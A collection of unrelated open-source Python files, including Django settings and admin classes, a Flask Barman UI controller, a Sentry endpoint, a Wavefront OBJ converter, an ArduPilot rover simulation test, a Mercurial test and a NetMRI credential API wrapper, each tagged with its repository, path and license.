TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
'/static/',
)
STATIC_URL = os.path.join(BASE_DIR, "static/")
cm_theme = 'cosmo'
# Default settings
BOOTSTRAP3 = {
# The URL to the jQuery JavaScript file
'jquery_url': '//code.jquery.com/jquery.min.js',
# The Bootstrap base URL
'base_url': '//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/',
# The complete URL to the Bootstrap CSS file (None means derive it
# from base_url)
# 'css_url': None,
'css_url': 'https://maxcdn.bootstrapcdn.com/bootswatch/3.3.5/' +
cm_theme + '/bootstrap.min.css',
# The complete URL to the Bootstrap CSS file (None means no theme)
'theme_url': None,
# 'theme_url': 'https://maxcdn.bootstrapcdn.com/bootswatch/3.3.5/flatly
# /bootstrap.min.css',
# 'theme_url': 'https://maxcdn.bootstrapcdn.com/bootswatch/3.3.5/flatly/',
# The complete URL to the Bootstrap JavaScript file (None means
# derive it from base_url)
'javascript_url': None,
# Put JavaScript in the HEAD section of the HTML document (only relevant
# if you use bootstrap3.html)
'javascript_in_head': True,
# Include jQuery with Bootstrap JavaScript (affects django-bootstrap3
# template tags)
'include_jquery': True,
# Label class to use in horizontal forms
'horizontal_label_class': 'col-md-3',
# Field class to use in horizontal forms
'horizontal_field_class': 'col-md-9',
# Set HTML required attribute on required fields
'set_required': True,
# Set HTML disabled attribute on disabled fields
'set_disabled': False,
# Set placeholder attributes to label if no placeholder is provided
'set_placeholder': True,
# Class to indicate required (better to set this in your Django form)
'required_css_class': '',
# Class to indicate error (better to set this in your Django form)
'error_css_class': 'has-error',
# Class to indicate success, meaning the field has valid input
# (better to set this in your Django form)
'success_css_class': 'has-success',
# Renderers (only set these if you have studied the source and
# understand the inner workings)
'formset_renderers': {
'default': 'bootstrap3.renderers.FormsetRenderer',
},
'form_renderers': {
'default': 'bootstrap3.renderers.FormRenderer',
},
'field_renderers': {
'default': 'bootstrap3.renderers.FieldRenderer',
'inline': 'bootstrap3.renderers.InlineFieldRenderer',
},
}
| cloudmesh/portal | old/cloudmesh_portal/settings.py | Python | apache-2.0 | 6,893 |
#-*-coding:utf-8-*-
class _AssignMixinEvent(object):
def __init__(self, request, from_employee, to_employee):
self.request = request
self.from_employee = from_employee
self.to_employee = to_employee
class AssignRun(_AssignMixinEvent):
pass
| mazvv/travelcrm | travelcrm/lib/events/assigns.py | Python | gpl-3.0 | 275 |
from flask import Blueprint, render_template, flash
from flask_login import login_required
from general.models import Rest
server = Blueprint('server', __name__, url_prefix='/server')
@server.route("/")
@login_required
def server_list():
rest = Rest()
list_server = rest.get_with_token('/barman/list-server')
list_return = []
if list_server.get('status_code') == 200:
list_send = list_server.get('list')
i = 0
for message in list_send:
if message != '':
message = message.split(' - ')
list_return.append({'name': message[0], 'desc': message[1], 'settings': [
{'icon': 'stats', 'target': '/server/status'}]})
i += 1
else:
flash(list_server.get('message'), 'error')
return render_template('list.html', list=list_return, panel_header='Server List',
table_header=['Name', 'Description', '#'], order=['name', 'desc', 'settings'])
@server.route("/status")
@login_required
def server_listd():
rest = Rest()
list_server = rest.get_with_token('/barman/list-server')
list_return = []
if list_server.get('status_code') == 200:
list_send = list_server.get('list')
i = 0
for message in list_send:
if message != '':
message = message.split(' - ')
list_return.append({'name': message[0], 'desc': message[1], 'settings': [
{'icon': 'stats', 'target': '/server/status'}]})
i += 1
else:
flash(list_server.get('message'), 'error')
return render_template('list.html', list=list_return, panel_header='Server List',
table_header=['Name', 'Description', '#'], order=['name', 'desc', 'settings'])
| emin100/barmanUI | barmanui/server/controllers.py | Python | gpl-3.0 | 1,807 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oj_core', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='problem',
name='background',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='hint',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='input',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='output',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='sample_input',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='sample_output',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='source',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='problem',
name='time_limitation',
field=models.TextField(blank=True),
),
]
| oj-development/oj-web | oj_core/migrations/0002_auto_20150821_0113.py | Python | mit | 1,625 |
# Copyright (C) 2011-2015 2ndQuadrant Italia (Devise.IT S.r.L.)
#
# This file is part of Barman.
#
# Barman is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Barman is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Barman. If not, see <http://www.gnu.org/licenses/>.
"""
The main Barman module
"""
from __future__ import absolute_import
from .version import __version__
__config__ = None
| xocolatl/pgbarman | barman/__init__.py | Python | gpl-3.0 | 838 |
from django.core import urlresolvers
from django.contrib import admin
from django.template import defaultfilters
from .. import models
# Helpers ##########
class ModelAdmin(admin.ModelAdmin):
""" deletion of top level objects is evil """
def has_delete_permission(self, request, obj=None):
return False
class ReadOnlyTabularInline(admin.TabularInline):
def has_add_permission(self, request):
return False
can_delete = False
class IdentifierInline(admin.TabularInline):
fields = ('identifier', 'scheme')
extra = 0
class LinkInline(admin.TabularInline):
fields = ('url', 'note')
extra = 0
class ContactDetailInline(admin.TabularInline):
fields = ('type', 'value', 'note', 'label')
extra = 0
class OtherNameInline(admin.TabularInline):
fields = ('name', 'note', 'start_date', 'end_date')
extra = 0
#class MimetypeLinkInline(admin.TabularInline):
# fields = ('media_type', 'url')
#class RelatedEntityInline(admin.TabularInline):
# fields = ('name', 'entity_type', 'organization', 'person')
# Divisions & Jurisdictions ##########
@admin.register(models.Division)
class DivisionAdmin(ModelAdmin):
list_display = ('name', 'id')
search_fields = list_display
fields = readonly_fields = ('id', 'name', 'redirect', 'country')
class LegislativeSessionInline(ReadOnlyTabularInline):
model = models.LegislativeSession
readonly_fields = ('identifier', 'name', 'classification')
@admin.register(models.Jurisdiction)
class JurisdictionAdmin(ModelAdmin):
list_display = ('name', 'id')
readonly_fields = fields = ('id', 'name', 'classification', 'url', 'division', 'feature_flags',
'extras')
inlines = [LegislativeSessionInline]
# Organizations and Posts #############
class OrganizationIdentifierInline(IdentifierInline):
model = models.OrganizationIdentifier
class OrganizationNameInline(OtherNameInline):
model = models.OrganizationName
class OrganizationContactDetailInline(ContactDetailInline):
model = models.OrganizationContactDetail
class OrganizationLinkInline(LinkInline):
model = models.OrganizationLink
class OrganizationSourceInline(LinkInline):
model = models.OrganizationSource
class PostInline(admin.TabularInline):
""" a read-only inline for posts here, with links to the real thing """
model = models.Post
extra = 0
fields = readonly_fields = ('label', 'role')
ordering = ('label',)
can_delete = False
show_change_link = True # Django 1.8?
@admin.register(models.Organization)
class OrganizationAdmin(ModelAdmin):
readonly_fields = ('id', 'classification', 'parent', 'jurisdiction', 'extras')
fields = (
'name', 'jurisdiction', 'id', 'classification',
'parent', ('founding_date', 'dissolution_date'),
'image', 'extras')
list_display = ('name', 'jurisdiction', 'classification')
list_select_related = ('jurisdiction',)
inlines = [
OrganizationIdentifierInline,
OrganizationNameInline,
OrganizationContactDetailInline,
OrganizationLinkInline,
OrganizationSourceInline,
PostInline
]
class PostContactDetailInline(ContactDetailInline):
model = models.PostContactDetail
class PostLinkInline(LinkInline):
model = models.PostLink
@admin.register(models.Post)
class PostAdmin(ModelAdmin):
readonly_fields = ('id', 'label', 'organization', 'division', 'extras', 'role')
fields = readonly_fields + (('start_date', 'end_date'), )
list_display = ('label', 'organization', 'division')
inlines = [
PostContactDetailInline,
PostLinkInline,
]
### People & Memberships #######
class PersonIdentifierInline(IdentifierInline):
model = models.PersonIdentifier
class PersonNameInline(OtherNameInline):
model = models.PersonName
class PersonContactDetailInline(ContactDetailInline):
model = models.PersonContactDetail
class PersonLinkInline(LinkInline):
model = models.PersonLink
class PersonSourceInline(LinkInline):
model = models.PersonSource
class MembershipInline(ReadOnlyTabularInline):
model = models.Membership
readonly_fields = ('organization', 'post')
fields = ('organization', 'post', 'label', 'role', 'start_date', 'end_date')
extra = 0
can_delete = False
@admin.register(models.Person)
class PersonAdmin(ModelAdmin):
search_fields = ['name']
readonly_fields = ('id', 'name', 'extras')
fields = (
'name', 'id', 'image',
('birth_date', 'death_date'),
('gender', 'national_identity', 'sort_name', 'summary'),
'biography', 'extras',
)
inlines = [
PersonIdentifierInline,
PersonNameInline,
PersonContactDetailInline,
PersonLinkInline,
PersonSourceInline,
MembershipInline
]
def get_memberships(self, obj):
memberships = obj.memberships.select_related('organization__jurisdiction')
html = []
SHOW_N = 5
for memb in memberships[:SHOW_N]:
info = (memb._meta.app_label, memb._meta.module_name)
admin_url = ''#urlresolvers.reverse('admin:%s_%s_change' % info, args=(memb.pk,))
tmpl = '<a href="%s">%s %s</a>\n'
html.append(tmpl % (
admin_url,
memb.organization.jurisdiction.name if memb.organization.jurisdiction else '',
memb.organization.name))
more = len(memberships) - SHOW_N
if 0 < more:
html.append('And %d more' % more)
return '<br/>'.join(html)
get_memberships.short_description = 'Memberships'
get_memberships.allow_tags = True
list_select_related = ('memberships',)
list_display = ('name', 'id', 'get_memberships')
class MembershipContactDetailInline(ContactDetailInline, ReadOnlyTabularInline):
model = models.MembershipContactDetail
class MembershipLinkInline(LinkInline, ReadOnlyTabularInline):
model = models.MembershipLink
@admin.register(models.Membership)
class MembershipAdmin(ModelAdmin):
readonly_fields = ('organization', 'person', 'post', 'on_behalf_of', 'extras')
list_display = ('organization', 'person', 'post', 'on_behalf_of',
'label', 'role', 'start_date', 'end_date',)
fields = ('organization', 'person', 'role', 'post', 'label', 'on_behalf_of',
('start_date', 'end_date'), 'extras')
list_select_related = ('post', 'person', 'organization', 'on_behalf_of')
inlines = [
MembershipContactDetailInline,
MembershipLinkInline,
]
# Bills ################
class BillAbstractInline(ReadOnlyTabularInline):
model = models.BillAbstract
readonly_fields = ('abstract', 'note')
can_delete = False
class BillTitleInline(ReadOnlyTabularInline):
model = models.BillTitle
readonly_fields = ('title', 'note')
can_delete = False
class BillIdentifierInline(IdentifierInline):
model = models.BillIdentifier
class BillActionInline(ReadOnlyTabularInline):
model = models.BillAction
readonly_fields = ('date', 'organization', 'description')
fields = ('date', 'description', 'organization')
ordering = ('date',)
# TODO: BillActionRelatedEntity
# TODO: RelatedBill
class BillSponsorshipInline(ReadOnlyTabularInline):
model = models.BillSponsorship
readonly_fields = fields = ('name', 'primary', 'classification')
extra = 0
# TODO: Document & Version
class BillSourceInline(ReadOnlyTabularInline):
readonly_fields = ('url', 'note')
model = models.BillSource
@admin.register(models.Bill)
class BillAdmin(admin.ModelAdmin):
readonly_fields = fields = (
'identifier', 'legislative_session', 'classification',
'from_organization', 'title', 'id', 'extras')
search_fields = ['identifier', 'title',]
list_select_related = (
'sources',
'legislative_session',
'legislative_session__jurisdiction',
)
inlines = [
BillAbstractInline,
BillTitleInline,
BillIdentifierInline,
BillActionInline,
BillSponsorshipInline,
BillSourceInline,
]
def get_jurisdiction_name(self, obj):
return obj.legislative_session.jurisdiction.name
get_jurisdiction_name.short_description = 'Jurisdiction'
def get_session_name(self, obj):
return obj.legislative_session.name
get_session_name.short_description = 'Session'
def source_link(self, obj):
source = obj.sources.filter(url__icontains="legislationdetail").get()
tmpl = u'<a href="{0}" target="_blank">View source</a>'
return tmpl.format(source.url)
source_link.short_description = 'View source'
source_link.allow_tags = True
def get_truncated_sponsors(self, obj):
spons = ', '.join(s.name for s in obj.sponsorships.all()[:5])
return defaultfilters.truncatewords(spons, 10)
get_truncated_sponsors.short_description = 'Sponsors'
def get_truncated_title(self, obj):
return defaultfilters.truncatewords(obj.title, 25)
get_truncated_title.short_description = 'Title'
list_display = (
'identifier', 'get_jurisdiction_name',
'get_session_name', 'get_truncated_sponsors',
'get_truncated_title', 'source_link')
list_filter = ('legislative_session__jurisdiction__name',)
| rshorey/python-opencivicdata-django | opencivicdata/admin/__init__.py | Python | bsd-3-clause | 9,394 |
from __future__ import absolute_import
from django.http import Http404
from rest_framework.response import Response
from sentry.api.bases.project import ProjectEndpoint, ProjectSettingPermission
from sentry.api.serializers import serialize
from sentry.integrations.slack import tasks
from sentry.models import Rule, RuleStatus
class ProjectRuleTaskDetailsEndpoint(ProjectEndpoint):
permission_classes = [ProjectSettingPermission]
def get(self, request, project, task_uuid):
"""
Retrieve the status of the async task
Return details of the rule if the task is successful
"""
client = tasks.RedisRuleStatus(task_uuid)
result = client.get_value()
status = result["status"]
rule_id = result.get("rule_id")
error = result.get("error")
# if the status is "pending" we don't have a rule yet or error
context = {"status": status, "rule": None, "error": None}
if rule_id and status == "success":
try:
rule = Rule.objects.get(
project=project,
id=int(rule_id),
status__in=[RuleStatus.ACTIVE, RuleStatus.INACTIVE],
)
context["rule"] = serialize(rule, request.user)
except Rule.DoesNotExist:
raise Http404
if status == "failed":
context["error"] = error
return Response(context, status=200)
| beeftornado/sentry | src/sentry/api/endpoints/project_rule_task_details.py | Python | bsd-3-clause | 1,470 |
#-*- coding: utf-8 -*-
# Contains implementation of Wavefront .OBJ importer
# Copyright (c) 2014 Tomasz Kapuściński
import re
import modelformat
import geometry
class ObjFormat(modelformat.ModelFormat):
def __init__(self):
self.description = 'Wavefront .OBJ format'
def get_extension(self):
return 'obj'
def read(self, filename, model, params):
# lists with parsed vertex attributes
vertex_coords = []
tex_coords = []
normals = []
materials = {}
# read file
input_file = open(filename, 'r')
flipX = 1.0
flipY = 1.0
flipZ = 1.0
if modelformat.get_param(params, 'flipX') != None: flipX = -1.0
if modelformat.get_param(params, 'flipY') != None: flipY = -1.0
if modelformat.get_param(params, 'flipZ') != None: flipZ = -1.0
flipOrder = (flipX * flipY * flipZ) < 0
# parse lines
while True:
line = input_file.readline()
if len(line) == 0:
break
if line[len(line)-1] == '\n':
line = line[:len(line)-1]
parts = line.split(' ')
if parts[0] == 'mtllib':
name = parts[1]
materials = read_mtl_file(name)
elif parts[0] == 'v':
vertex_coords.append(geometry.VertexCoord(flipX * float(parts[1]), flipY * float(parts[2]), flipZ * float(parts[3])))
elif parts[0] == 'vt':
tex_coords.append(geometry.TexCoord(float(parts[1]), 1 - float(parts[2])))
elif parts[0] == 'vn':
normals.append(geometry.Normal(flipX * float(parts[1]), flipY * float(parts[2]), flipZ * float(parts[3])))
elif parts[0] == 'usemtl':
current_material = materials[parts[1]]
elif parts[0] == 'f':
polygon = []
# parse vertices
for i in range(1, len(parts)):
elements = parts[i].split('/')
vert_coord = vertex_coords[int(elements[0]) - 1]
normal = normals[int(elements[2]) - 1]
if elements[1] == '':
tex_coord = geometry.TexCoord(0.0, 0.0)
else:
tex_coord = tex_coords[int(elements[1]) - 1]
polygon.append(geometry.Vertex(vert_coord, normal, tex_coord))
# triangulate polygon
new_triangles = geometry.triangulate(polygon, flipOrder)
# save vertices
for triangle in new_triangles:
triangle.material = current_material
model.triangles.append(triangle)
input_file.close()
return True
def write(self, filename, model, params):
model_file = open(filename, 'w')
materials_filename = filename
if materials_filename.find('.obj'):
materials_filename = materials_filename.replace('.obj', '.mtl')
materials_file = open(materials_filename, 'w')
materials = []
vertex_coords = []
tex_coords = []
normals = []
faces = []
flipX = 1.0
flipY = 1.0
flipZ = 1.0
if modelformat.get_param(params, 'flipX') != None: flipX = -1.0
if modelformat.get_param(params, 'flipY') != None: flipY = -1.0
if modelformat.get_param(params, 'flipZ') != None: flipZ = -1.0
flipOrder = (flipX * flipY * flipZ) < 0
materials_file.write('# Materials\n')
for triangle in model.triangles:
mat = triangle.material
if triangle.material not in materials:
materials.append(mat)
name = 'Material_{}_[{}]'.format(len(materials), geometry.decode_state(mat.state))
mat.name = name
materials_file.write('\n')
materials_file.write('newmtl {}\n'.format(name))
if mat.texture != '':
materials_file.write('map_Kd {}\n'.format(mat.texture))
materials_file.write('Ns 96.078431\n')
materials_file.write('Ka {} {} {}\n'.format(mat.ambient[0], mat.ambient[1], mat.ambient[2]))
materials_file.write('Kd {} {} {}\n'.format(mat.diffuse[0], mat.diffuse[1], mat.diffuse[2]))
materials_file.write('Ks {} {} {}\n'.format(mat.specular[0], mat.specular[1], mat.specular[2]))
materials_file.write('Ni 1.000000\n')
materials_file.write('d 1.000000\n')
materials_file.write('illum 2\n')
else:
for mater in materials:
if mat == mater:
mat = mater
face = []
for vertex in triangle.vertices:
vertex_coord = geometry.VertexCoord(vertex.x, vertex.y, vertex.z)
tex_coord = geometry.TexCoord(vertex.u1, vertex.v1)
normal = geometry.Normal(vertex.nx, vertex.ny, vertex.nz)
# looking for vertex coordinate
vertex_coord_index = -1
for i in range(len(vertex_coords)):
if vertex_coord == vertex_coords[i]:
vertex_coord_index = i
if vertex_coord_index == -1:
vertex_coord_index = len(vertex_coords)
vertex_coords.append(vertex_coord)
# looking for texture coordinate
tex_coord_index = -1
for i in range(len(tex_coords)):
if tex_coord == tex_coords[i]:
tex_coord_index = i
if tex_coord_index == -1:
tex_coord_index = len(tex_coords)
tex_coords.append(tex_coord)
# looking for normal
normal_index = -1
for i in range(len(normals)):
if normal == normals[i]:
normal_index = i
if normal_index == -1:
normal_index = len(normals)
normals.append(normal)
for mat in materials:
if mat == triangle.material:
mat_name = mat.name
vertex_indices = [ vertex_coord_index + 1, tex_coord_index + 1, normal_index + 1, mat_name ]
face.append(vertex_indices)
faces.append(face)
# write vertex coordinates
model_file.write('mtllib {}\n'.format(materials_filename))
for v in vertex_coords:
model_file.write('v {} {} {}\n'.format(flipX * v.x, flipY * v.y, flipZ * v.z))
for t in tex_coords:
model_file.write('vt {} {}\n'.format(t.u, t.v))
for n in normals:
model_file.write('vn {} {} {}\n'.format(flipX * n.x, flipY * n.y, flipZ * n.z))
mat_name = ''
model_file.write('s off\n')
# write faces
for f in faces:
name = f[0][3]
if name != mat_name:
model_file.write('usemtl {}\n'.format(name))
mat_name = name
model_file.write('f')
if flipOrder:
model_file.write(' {}/{}/{}'.format(f[0][0], f[0][1], f[0][2]))
model_file.write(' {}/{}/{}'.format(f[2][0], f[2][1], f[2][2]))
model_file.write(' {}/{}/{}'.format(f[1][0], f[1][1], f[1][2]))
else:
for v in f:
model_file.write(' {}/{}/{}'.format(v[0], v[1], v[2]))
model_file.write('\n')
model_file.close()
materials_file.close()
return True
modelformat.register_format('obj', ObjFormat())
modelformat.register_extension('obj', 'obj')
# state regex pattern
state_pattern = re.compile(r'^.+(\[(.+?)\])$')
# reads Wavefront .MTL material file
def read_mtl_file(filename):
materials = {}
input_file = open(filename, 'r')
while True:
line = input_file.readline()
if len(line) == 0:
break
if line[len(line)-1] == '\n':
line = line[:len(line)-1]
parts = line.split(' ')
if parts[0] == 'newmtl':
current_material = geometry.Material()
match = state_pattern.match(parts[1])
if match is not None:
current_material.state = geometry.encode_state(match.group(2))
materials[parts[1]] = current_material
elif parts[0] == 'Ka':
for i in range(3):
current_material.ambient[i] = float(parts[i+1])
elif parts[0] == 'Kd':
for i in range(3):
current_material.diffuse[i] = float(parts[i+1])
elif parts[0] == 'Ks':
for i in range(3):
current_material.specular[i] = float(parts[i+1])
elif parts[0] == 'map_Kd':
current_material.texture = parts[1]
input_file.close()
return materials
| tomaszkax86/Colobot-Model-Converter | objformat.py | Python | bsd-2-clause | 9,215 |
import cPickle as pickle
import sys
def main():
numargs = len(sys.argv)
w = None
if numargs == 2:
fname = sys.argv[1]
else:
fname = "../wordnet/WNedges.csv"
relsSet = set()
with open (fname, "r") as f:
for idx, line in enumerate(f):
if idx == 0:
continue
relType = line[0:-1].split('\t')[2][1:-1] # last field, removing commas
relsSet.add(relType)
pickle.dump( relsSet, open("../wordnet/relsSet.p", "wb") )
if __name__ == "__main__":
main() | redsk/neo_wordnet | relsSet.py | Python | gpl-2.0 | 552 |
# drive APMrover2 in SITL
import util, pexpect, sys, time, math, shutil, os
from common import *
from pymavlink import mavutil
import random
# get location of scripts
testdir=os.path.dirname(os.path.realpath(__file__))
#HOME=mavutil.location(-35.362938,149.165085,584,270)
HOME=mavutil.location(40.071374969556928,-105.22978898137808,1583.702759,246)
homeloc = None
def arm_rover(mavproxy, mav):
# wait for EKF to settle
wait_seconds(mav, 15)
mavproxy.send('arm throttle\n')
mavproxy.expect('ARMED')
print("ROVER ARMED")
return True
def drive_left_circuit(mavproxy, mav):
'''drive a left circuit, 50m on a side'''
mavproxy.send('switch 6\n')
wait_mode(mav, 'MANUAL')
mavproxy.send('rc 3 2000\n')
print("Driving left circuit")
# do 4 turns
for i in range(0,4):
# hard left
print("Starting turn %u" % i)
mavproxy.send('rc 1 1000\n')
if not wait_heading(mav, 270 - (90*i), accuracy=10):
return False
mavproxy.send('rc 1 1500\n')
print("Starting leg %u" % i)
if not wait_distance(mav, 50, accuracy=7):
return False
mavproxy.send('rc 3 1500\n')
print("Circuit complete")
return True
def drive_RTL(mavproxy, mav):
'''drive to home'''
print("Driving home in RTL")
mavproxy.send('switch 3\n')
if not wait_location(mav, homeloc, accuracy=22, timeout=90):
return False
print("RTL Complete")
return True
def setup_rc(mavproxy):
'''setup RC override control'''
for chan in [1,2,3,4,5,6,7]:
mavproxy.send('rc %u 1500\n' % chan)
mavproxy.send('rc 8 1800\n')
def drive_mission(mavproxy, mav, filename):
'''drive a mission from a file'''
global homeloc
print("Driving mission %s" % filename)
mavproxy.send('wp load %s\n' % filename)
mavproxy.expect('Flight plan received')
mavproxy.send('wp list\n')
mavproxy.expect('Requesting [0-9]+ waypoints')
mavproxy.send('switch 4\n') # auto mode
mavproxy.send('rc 3 1500\n')
wait_mode(mav, 'AUTO')
if not wait_waypoint(mav, 1, 4, max_dist=5):
return False
wait_mode(mav, 'HOLD')
print("Mission OK")
return True
def drive_APMrover2(viewerip=None, map=False):
'''drive APMrover2 in SIL
you can pass viewerip as an IP address to optionally send fg and
mavproxy packets too for local viewing of the mission in real time
'''
global homeloc
options = '--sitl=127.0.0.1:5501 --out=127.0.0.1:19550 --streamrate=10'
if viewerip:
options += " --out=%s:14550" % viewerip
if map:
options += ' --map'
home = "%f,%f,%u,%u" % (HOME.lat, HOME.lng, HOME.alt, HOME.heading)
sil = util.start_SIL('APMrover2', wipe=True, model='rover', home=home, speedup=10)
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
print("WAITING FOR PARAMETERS")
mavproxy.expect('Received [0-9]+ parameters')
# setup test parameters
mavproxy.send("param load %s/Rover.parm\n" % testdir)
mavproxy.expect('Loaded [0-9]+ parameters')
# restart with new parms
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
sil = util.start_SIL('APMrover2', model='rover', home=home, speedup=10)
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
mavproxy.expect('Telemetry log: (\S+)')
logfile = mavproxy.match.group(1)
print("LOGFILE %s" % logfile)
buildlog = util.reltopdir("../buildlogs/APMrover2-test.tlog")
print("buildlog=%s" % buildlog)
if os.path.exists(buildlog):
os.unlink(buildlog)
try:
os.link(logfile, buildlog)
except Exception:
pass
mavproxy.expect('Received [0-9]+ parameters')
util.expect_setup_callback(mavproxy, expect_callback)
expect_list_clear()
expect_list_extend([sil, mavproxy])
print("Started simulator")
# get a mavlink connection going
try:
mav = mavutil.mavlink_connection('127.0.0.1:19550', robust_parsing=True)
except Exception, msg:
print("Failed to start mavlink connection on 127.0.0.1:19550" % msg)
raise
mav.message_hooks.append(message_hook)
mav.idle_hooks.append(idle_hook)
failed = False
e = 'None'
try:
print("Waiting for a heartbeat with mavlink protocol %s" % mav.WIRE_PROTOCOL_VERSION)
mav.wait_heartbeat()
print("Setting up RC parameters")
setup_rc(mavproxy)
print("Waiting for GPS fix")
mav.wait_gps_fix()
homeloc = mav.location()
print("Home location: %s" % homeloc)
if not arm_rover(mavproxy, mav):
print("Failed to ARM")
failed = True
if not drive_mission(mavproxy, mav, os.path.join(testdir, "rover1.txt")):
print("Failed mission")
failed = True
if not log_download(mavproxy, mav, util.reltopdir("../buildlogs/APMrover2-log.bin")):
print("Failed log download")
failed = True
# if not drive_left_circuit(mavproxy, mav):
# print("Failed left circuit")
# failed = True
# if not drive_RTL(mavproxy, mav):
# print("Failed RTL")
# failed = True
except pexpect.TIMEOUT, e:
print("Failed with timeout")
failed = True
mav.close()
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
if os.path.exists('APMrover2-valgrind.log'):
os.chmod('APMrover2-valgrind.log', 0644)
shutil.copy("APMrover2-valgrind.log", util.reltopdir("../buildlogs/APMrover2-valgrind.log"))
if failed:
print("FAILED: %s" % e)
return False
return True
| flyngPig/APM_simulink | ardupilot/Tools/autotest/apmrover2.py | Python | gpl-3.0 | 5,678 |
#!/usr/bin/env python
"""
Tests the behaviour of filelog w.r.t. data starting with '\1\n'
"""
from mercurial import ui, hg
from mercurial.node import nullid, hex
myui = ui.ui()
repo = hg.repository(myui, path='.', create=True)
fl = repo.file('foobar')
def addrev(text, renamed=False):
if renamed:
# data doesn't matter. Just make sure filelog.renamed() returns True
meta = dict(copyrev=hex(nullid), copy='bar')
else:
meta = {}
lock = t = None
try:
lock = repo.lock()
t = repo.transaction('commit')
node = fl.add(text, meta, t, 0, nullid, nullid)
return node
finally:
if t:
t.close()
if lock:
lock.release()
def error(text):
print 'ERROR: ' + text
textwith = '\1\nfoo'
without = 'foo'
node = addrev(textwith)
if not textwith == fl.read(node):
error('filelog.read for data starting with \\1\\n')
if fl.cmp(node, textwith) or not fl.cmp(node, without):
error('filelog.cmp for data starting with \\1\\n')
if fl.size(0) != len(textwith):
error('FIXME: This is a known failure of filelog.size for data starting '
'with \\1\\n')
node = addrev(textwith, renamed=True)
if not textwith == fl.read(node):
error('filelog.read for a renaming + data starting with \\1\\n')
if fl.cmp(node, textwith) or not fl.cmp(node, without):
error('filelog.cmp for a renaming + data starting with \\1\\n')
if fl.size(1) != len(textwith):
error('filelog.size for a renaming + data starting with \\1\\n')
print 'OK.'
| iaddict/mercurial.rb | vendor/mercurial/tests/test-filelog.py | Python | mit | 1,549 |
from ..broker import Broker
class CLICredentialBroker(Broker):
controller = "cli_credentials"
def index(self, **kwargs):
"""Lists the available cli credentials. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each CLICredential. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credentials: An array of the CLICredential objects that match the specified input criteria.
:rtype cli_credentials: Array of CLICredential
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified cli credential.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credential: The cli credential identified by the specified id.
:rtype cli_credential: CLICredential
"""
